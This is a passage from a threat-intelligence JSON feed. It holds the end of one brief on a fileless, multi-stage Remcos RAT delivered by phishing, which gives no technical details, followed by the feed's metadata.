memory-resident execution, but specific technical details are not provided in this brief.","title":"Fileless Multi-Stage Remcos RAT via Phishing","url":"https://feed.craftedsignal.io/briefs/2024-01-remcos-fileless/"}],"language":"en","title":"CraftedSignal Threat Feed — Rat","version":"https://jsonfeed.org/version/1.1"}